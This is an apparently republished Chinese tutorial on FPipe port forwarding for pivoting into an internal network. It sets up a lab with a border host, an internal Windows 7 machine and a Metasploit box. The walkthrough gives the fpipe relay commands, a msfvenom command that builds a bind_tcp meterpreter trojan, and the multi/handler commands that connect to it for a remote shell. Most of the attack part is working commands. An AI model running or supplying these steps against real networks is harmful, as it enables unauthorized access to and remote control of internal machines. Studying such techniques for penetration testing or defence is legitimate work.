您好,登錄后才能下訂單哦!
這篇文章給大家介紹如何理解FPipe端口轉發,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
注:
邊界機器 win08 192.168.222.175
內網機器 win7 192.168.222.137
msf機器 Ubuntu 192.168.222.177
0x01 FPipe介紹
FPipe即forward pipe,在兩個端口中間建立一個管道,來實現流量的轉發,一般用于內網機器不能正常上網的情況,而且不需要考慮免殺,但是必須要有邊界機器,它不僅支持TCP流量的轉發,還支持UDP的。
0x02 端口轉發
將來自外部53端口的流量,通過本地的53端口轉發到內網的3389端口
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137
然后回到本地來遠程連接就可以了
0x03 msf正向上線
這里我們使用bind型的payload,保證讓無法正常上網的內網主機也能正常反彈shell
正常生成一個馬
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
之后去邊界機器執行轉發
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137
在內網機器上運行我們的馬
回到Ubuntu上進行監聽
use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport 53set rhost 192.168.222.175run
這里的Died是生成的馬有問題,之后換一下payload就可以搞定了,這個不必在意
根據實際情況來進行使用就ok了
關于如何理解FPipe端口轉發就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。